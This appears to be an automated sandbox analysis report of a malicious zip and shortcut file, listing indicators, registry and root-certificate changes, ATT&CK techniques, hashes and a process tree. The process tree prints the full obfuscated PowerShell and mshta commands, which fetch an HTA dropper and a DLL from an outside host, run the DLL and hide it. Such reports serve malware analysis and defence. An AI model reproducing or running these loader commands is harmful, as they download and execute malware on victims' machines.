8e4fdc6db367e299844c890efda88425da66e7f6247b11e89a0eba7fd7c57588

Analysis

max time kernel
68s
max time network
132s
platform
windows7_x64
resource
win7-20220414-en
submitted
18/06/2022, 03:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8e4fdc6db367e299844c890efda88425da66e7f6247b11e89a0eba7fd7c57588.zip
Size

3.1MB
MD5

a515d83b2794491048040a28d85fe75d
SHA1

fddb57bedf443d63f57d39e8dc0f07c9c520f8e2
SHA256

8e4fdc6db367e299844c890efda88425da66e7f6247b11e89a0eba7fd7c57588
SHA512

f684bea03072dfc1c9cfb44ca5c63bbccb0a897d0b4ed59f0fcf4005eaa901d1143aca68b77544e748526a346879ecb0d988469ef3bac6bef7219aa14bc550b7

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://pidipurev.com/a1799.hta

Signatures

Blocklisted process makes network request 10 IoCs

flow	pid	Process
5	1404	mshta.exe
7	1404	mshta.exe
9	1404	mshta.exe
11	1404	mshta.exe
13	1404	mshta.exe
15	1184	mshta.exe
17	2020	powershell.exe
18	2020	powershell.exe
19	584	powershell.exe
20	584	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	mshta.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	mshta.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
760	powershell.exe
1620	powershell.exe
2020	powershell.exe
584	powershell.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: 33	1816	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1816	AUDIODG.EXE
Token: 33	1816	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1816	AUDIODG.EXE
Token: SeRestorePrivilege	1600	7zG.exe
Token: 35	1600	7zG.exe
Token: SeSecurityPrivilege	1600	7zG.exe
Token: SeSecurityPrivilege	1600	7zG.exe
Token: SeDebugPrivilege	760	powershell.exe
Token: SeDebugPrivilege	1620	powershell.exe
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeDebugPrivilege	584	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1600	7zG.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 760 wrote to memory of 1404	760	powershell.exe	36
PID 760 wrote to memory of 1404	760	powershell.exe	36
PID 760 wrote to memory of 1404	760	powershell.exe	36
PID 1620 wrote to memory of 1184	1620	powershell.exe	40
PID 1620 wrote to memory of 1184	1620	powershell.exe	40
PID 1620 wrote to memory of 1184	1620	powershell.exe	40
PID 1404 wrote to memory of 2020	1404	mshta.exe	42
PID 1404 wrote to memory of 2020	1404	mshta.exe	42
PID 1404 wrote to memory of 2020	1404	mshta.exe	42
PID 1184 wrote to memory of 584	1184	mshta.exe	44
PID 1184 wrote to memory of 584	1184	mshta.exe	44
PID 1184 wrote to memory of 584	1184	mshta.exe	44
PID 2020 wrote to memory of 1932	2020	powershell.exe	46
PID 2020 wrote to memory of 1932	2020	powershell.exe	46
PID 2020 wrote to memory of 1932	2020	powershell.exe	46
PID 584 wrote to memory of 528	584	powershell.exe	48
PID 584 wrote to memory of 528	584	powershell.exe	48
PID 584 wrote to memory of 528	584	powershell.exe	48

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\8e4fdc6db367e299844c890efda88425da66e7f6247b11e89a0eba7fd7c57588.zip
1⤵
PID:1672

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1668

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x1ec
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1816

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\8e4fdc6db367e299844c890efda88425da66e7f6247b11e89a0eba7fd7c57588\" -spe -an -ai#7zMap3019:208:7zEvent19161
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $uVOFxPZI = [convert]::FromBase64String('enZr');$SvjOMbNF = [convert]::FromBase64String('XkBbR1ITW0dHQ0AJHBxDWldaQ0ZBVkUdUFxeHFICBAoKHVtHUg==');$OFVQWJMp = -join($uVOFxPZI | % {[char] ($_ -bxor 0x33)});$ZwhCtgVk = -join ($SvjOMbNF | % { [char] ($_ -bxor 0x33)});sal idMJYXuL $OFVQWJMp;idMJYXuL $ZwhCtgVk
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:760
- C:\Windows\system32\mshta.exe
  "C:\Windows\system32\mshta.exe" https://pidipurev.com/a1799.hta
  2⤵
  - Blocklisted process makes network request
  - Modifies Internet Explorer settings
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory
  PID:1404
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function cWJskuQlbOmpMA($ukeBbVmYNH, $EFucjtI){[IO.File]::WriteAllBytes($ukeBbVmYNH, $EFucjtI)};function zyZFKJmgHX($ukeBbVmYNH){if($ukeBbVmYNH.EndsWith((tXhPzTmXMFNFufDI @(68534,68588,68596,68596))) -eq $True){Start-Process (tXhPzTmXMFNFufDI @(rundll32.exe $ukeBbVmYNH ,TSErsNqyhR ))}elseif($ukeBbVmYNH.EndsWith((tXhPzTmXMFNFufDI @(68534,68600,68603,68537))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ukeBbVmYNH}else{Start-Process $ukeBbVmYNH}};function kpcQqRGkdksJXcLvOm($cWJskuQlbOmpMA){$jXeMAsDGusrM=(tXhPzTmXMFNFufDI @(68560,68593,68588,68588,68589,68598));$PlebPQOXHehbVKBBhSo=(Get-ChildItem $cWJskuQlbOmpMA -Force);$PlebPQOXHehbVKBBhSo.Attributes=$PlebPQOXHehbVKBBhSo.Attributes -bor ([IO.FileAttributes]$jXeMAsDGusrM).value__};function CnfznBhFm($qmukbsVTysBgrFlHF){$XovuEuCBHyBHjrpc = New-Object (tXhPzTmXMFNFufDI @(68566,68589,68604,68534,68575,68589,68586,68555,68596,68593,68589,68598,68604));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$EFucjtI = $XovuEuCBHyBHjrpc.DownloadData($qmukbsVTysBgrFlHF);return $EFucjtI};function tXhPzTmXMFNFufDI($cIhrmkNsmwm){$CcKhtridtJs=68488;$mssiUtTLO=$Null;foreach($AMEOxEPSnbDIIHAZ in $cIhrmkNsmwm){$mssiUtTLO+=[char]($AMEOxEPSnbDIIHAZ-$CcKhtridtJs)};return $mssiUtTLO};function wRHQAOwSkVoz(){$DQTYahmqYv = $env:AppData + '\';;$bCCPiHWusHeO = $DQTYahmqYv + '';If(Test-Path -Path $bCCPiHWusHeO){Invoke-Item $bCCPiHWusHeO;}Else{ $eSzamRIZLBTJ = CnfznBhFm (tXhPzTmXMFNFufDI @(68592,68604,68604,68600,68603,68546,68535,68535));cWJskuQlbOmpMA $bCCPiHWusHeO $eSzamRIZLBTJ;Invoke-Item $bCCPiHWusHeO;}$CRGBhJNKWPuzGc = $DQTYahmqYv + 'a17_cr99.dll'; if (Test-Path -Path $CRGBhJNKWPuzGc){zyZFKJmgHX $CRGBhJNKWPuzGc;}Else{ $FKoBPFKAjO = CnfznBhFm (tXhPzTmXMFNFufDI @(68592,68604,68604,68600,68603,68546,68535,68535,68600,68593,68588,68593,68600,68605,68602,68589,68606,68534,68587,68599,68597,68535,68585,68537,68543,68583,68587,68602,68545,68545,68534,68588,68596,68596));cWJskuQlbOmpMA $CRGBhJNKWPuzGc $FKoBPFKAjO;zyZFKJmgHX $CRGBhJNKWPuzGc;};kpcQqRGkdksJXcLvOm $CRGBhJNKWPuzGc;;;;;}wRHQAOwSkVoz;
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2020
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a17_cr99.dll TSErsNqyhR
      4⤵
      PID:1932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $uVOFxPZI = [convert]::FromBase64String('enZr');$SvjOMbNF = [convert]::FromBase64String('XkBbR1ITW0dHQ0AJHBxDWldaQ0ZBVkUdUFxeHFICBAoKHVtHUg==');$OFVQWJMp = -join($uVOFxPZI | % {[char] ($_ -bxor 0x33)});$ZwhCtgVk = -join ($SvjOMbNF | % { [char] ($_ -bxor 0x33)});sal idMJYXuL $OFVQWJMp;idMJYXuL $ZwhCtgVk
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1620
- C:\Windows\system32\mshta.exe
  "C:\Windows\system32\mshta.exe" https://pidipurev.com/a1799.hta
  2⤵
  - Blocklisted process makes network request
  - Modifies Internet Explorer settings
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory
  PID:1184
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function cWJskuQlbOmpMA($ukeBbVmYNH, $EFucjtI){[IO.File]::WriteAllBytes($ukeBbVmYNH, $EFucjtI)};function zyZFKJmgHX($ukeBbVmYNH){if($ukeBbVmYNH.EndsWith((tXhPzTmXMFNFufDI @(68534,68588,68596,68596))) -eq $True){Start-Process (tXhPzTmXMFNFufDI @(rundll32.exe $ukeBbVmYNH ,TSErsNqyhR ))}elseif($ukeBbVmYNH.EndsWith((tXhPzTmXMFNFufDI @(68534,68600,68603,68537))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ukeBbVmYNH}else{Start-Process $ukeBbVmYNH}};function kpcQqRGkdksJXcLvOm($cWJskuQlbOmpMA){$jXeMAsDGusrM=(tXhPzTmXMFNFufDI @(68560,68593,68588,68588,68589,68598));$PlebPQOXHehbVKBBhSo=(Get-ChildItem $cWJskuQlbOmpMA -Force);$PlebPQOXHehbVKBBhSo.Attributes=$PlebPQOXHehbVKBBhSo.Attributes -bor ([IO.FileAttributes]$jXeMAsDGusrM).value__};function CnfznBhFm($qmukbsVTysBgrFlHF){$XovuEuCBHyBHjrpc = New-Object (tXhPzTmXMFNFufDI @(68566,68589,68604,68534,68575,68589,68586,68555,68596,68593,68589,68598,68604));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$EFucjtI = $XovuEuCBHyBHjrpc.DownloadData($qmukbsVTysBgrFlHF);return $EFucjtI};function tXhPzTmXMFNFufDI($cIhrmkNsmwm){$CcKhtridtJs=68488;$mssiUtTLO=$Null;foreach($AMEOxEPSnbDIIHAZ in $cIhrmkNsmwm){$mssiUtTLO+=[char]($AMEOxEPSnbDIIHAZ-$CcKhtridtJs)};return $mssiUtTLO};function wRHQAOwSkVoz(){$DQTYahmqYv = $env:AppData + '\';;$bCCPiHWusHeO = $DQTYahmqYv + '';If(Test-Path -Path $bCCPiHWusHeO){Invoke-Item $bCCPiHWusHeO;}Else{ $eSzamRIZLBTJ = CnfznBhFm (tXhPzTmXMFNFufDI @(68592,68604,68604,68600,68603,68546,68535,68535));cWJskuQlbOmpMA $bCCPiHWusHeO $eSzamRIZLBTJ;Invoke-Item $bCCPiHWusHeO;}$CRGBhJNKWPuzGc = $DQTYahmqYv + 'a17_cr99.dll'; if (Test-Path -Path $CRGBhJNKWPuzGc){zyZFKJmgHX $CRGBhJNKWPuzGc;}Else{ $FKoBPFKAjO = CnfznBhFm (tXhPzTmXMFNFufDI @(68592,68604,68604,68600,68603,68546,68535,68535,68600,68593,68588,68593,68600,68605,68602,68589,68606,68534,68587,68599,68597,68535,68585,68537,68543,68583,68587,68602,68545,68545,68534,68588,68596,68596));cWJskuQlbOmpMA $CRGBhJNKWPuzGc $FKoBPFKAjO;zyZFKJmgHX $CRGBhJNKWPuzGc;};kpcQqRGkdksJXcLvOm $CRGBhJNKWPuzGc;;;;;}wRHQAOwSkVoz;
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:584
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a17_cr99.dll TSErsNqyhR
      4⤵
      PID:528

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

Filesize
727B

MD5
caff41558a9421585fa0258541273201

SHA1
ea4d399583f5e2439fa90ac7120aa9386e39913b

SHA256
8b7e4659200ec2fae99c90e9e108baa3add971729dd34c8cf3eb9a966ff6adbe

SHA512
c4faeed1b967e5988b298e875618e2c870c10d84a4ef3b1aeafa754c70dbfaab4496069911229bf4e501b940ef9c2df8c415b83647694e6ce075b76a0fd3cd06

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\83356274875D39E3727E56EB1247C8F6

Filesize
472B

MD5
6abcd5034e05b7a7325021ad9433b9e5

SHA1
0236ee411d0d4e08a1aa875de23fb446261b3630

SHA256
e11deb02d5e31215890ce461e3b9cfe9c996867aada52e054881cbccf44f6d84

SHA512
9c3e3149df7d01f6d29c1db4522ce98cd188784a3bf6a74edf2c7e39b46d5366bfdaf681606c02ba6552a4979d84e77619e43ed595f720b05bdf197c2b9d94ef

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
60KB

MD5
308336e7f515478969b24c13ded11ede

SHA1
8fb0cf42b77dbbef224a1e5fc38abc2486320775

SHA256
889b832323726a9f10ad03f85562048fdcfe20c9ff6f9d37412cf477b4e92ff9

SHA512
61ad97228cd6c3909ef3ac5e4940199971f293bdd0d5eb7916e60469573a44b6287c0fa1e0b6c1389df35eb6c9a7d2a61fdb318d4a886a3821ef5a9dab3ac24f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

Filesize
471B

MD5
96a37736324a0ab3c61cd420daa2a652

SHA1
ff87694cb310e6ad4f17b8e3ed08d31a8cff6b4b

SHA256
c0db9dc9a94573110bc54d7c16be404ee611167e0860bbafd42eefe450488598

SHA512
8b22ba624bea8809d3915b85895f7bd995ee497c5b3861867cf76a42541b95c07613bb49429559be165819fe9b933df571b0b080d7786e7d90005c8b91cfa12e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

Filesize
402B

MD5
fb1a59c932127f1556d60916882b384d

SHA1
e64793746fdedba74b48409312f6d1c3bcdfabdc

SHA256
d4bb908a565dc0bc199719ea12f4379b2246efbc7b18258ea51273592527b18f

SHA512
f8a033bc986a43ed87d84f87b50bb9bf20c4c88f557e1d8ae8845e12f64c17bc07d6805d5a2fe48c2fbbe2e6d205b454dea258b6be2397a469fc975e9c18093e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\83356274875D39E3727E56EB1247C8F6

Filesize
398B

MD5
951f791e94f95c72862aa880d7940cbd

SHA1
3e8bc095e1adade7ce43235b4b94e4533e5caca9

SHA256
e7448bcc22f9bced9e6121e64e508306b16ff72b3e5d7a9488045b77b213329e

SHA512
61746fad61ff66257679f5888d4691cb4ca13e6da3d48daa1a459a0ee3695ade006ed69dc6ef25fa942ea839daee0b40b81b2a47be0b600f4acf25c2ff41a7b5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
03a2397291df57b1df9741c58aa1a621

SHA1
81180dfb1e76eca1f8e2c0dead6fc4d22c08565b

SHA256
56a3be637a95bbbc5fd78aa94ac4c7306327e0066baaf9c0e7aab31f82f04e30

SHA512
14e2aa29097434129e768f015486a9f9b56fe714e23e703789a385a0a2c1c080eebbf018fb651321f58ed6a142e09e5735d79ace299518f734795eea612dab5a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

Filesize
396B

MD5
6c918e04f5c3295cbef37aacf2943cf5

SHA1
75e68f419829a0c76e1c19b41349c3d0476fc8b5

SHA256
c39035de91224ad89cb63c6dc9487501bb64952c35ae5699f9609eb7ac535e67

SHA512
24273e70984878c2e07c6caac699e89e017fca4c7dc296ca8a783f4120d2c580f21da5ce0552c4b0c9db1914f262f2c5f953ac112485ab66c93a3d942325712f

Download Submit
C:\Users\Admin\AppData\Local\Temp\8e4fdc6db367e299844c890efda88425da66e7f6247b11e89a0eba7fd7c57588\PRD.lnk

Filesize
1.9MB

MD5
6d3b37ea0e22cb04d9227dee552663f4

SHA1
2e1d39395fc36693d2abff8709db4261909e7cda

SHA256
9c4cfd85af061badf6bab38ace88be3a6a21e64fd99571eee8e93fed745261f9

SHA512
3089cecd1b4fb2c843aec61f1cb5a28f8c1052c5ff7296301a6702050b0916b847f199bf78134d88bca1797eabfa70721a9d26d425bc50053018954e290302c7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2ce503d076354307.customDestinations-ms

Filesize
7KB

MD5
3a06b349a8f2d2a903cfab606b4b7eca

SHA1
346d6d1feb96e0d7be6c27f83a675000979bb7b5

SHA256
8a082c18b9a096652c1ca77f32b0f7b703127a5333d5ea9958b4c1244a7184a9

SHA512
cbebf49a52de4b33721990d027190fb72472af6360bc928df0b900c7cc0a615e4a89339e25a13c3e5c7fe3c6df3abbffd27af72a3963f3aaab0903c9b8213657

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
608c9f9bfb2c4aeaa3db02348d69aecf

SHA1
6bf1c7ba482ce21f015e733d2ff3b1bda89e0dcd

SHA256
39b418a9fb0b7dbeb7befba41747aeba73f1fb80c39ad70da8e6e1385acdb9ed

SHA512
f3b2d1495614a03a951263b9406f814dd5156c7c297d5ac279dde2c26767ef9ddf707e110fe85e68236d4aa141eb844e52f34e3d47f22c54c97fa23bef2bfe3a

Download Submit
memory/584-101-0x000000000283B000-0x000000000285A000-memory.dmp

Filesize
124KB

Download
memory/584-100-0x0000000002834000-0x0000000002837000-memory.dmp

Filesize
12KB

Download
memory/584-98-0x000000000283B000-0x000000000285A000-memory.dmp

Filesize
124KB

Download
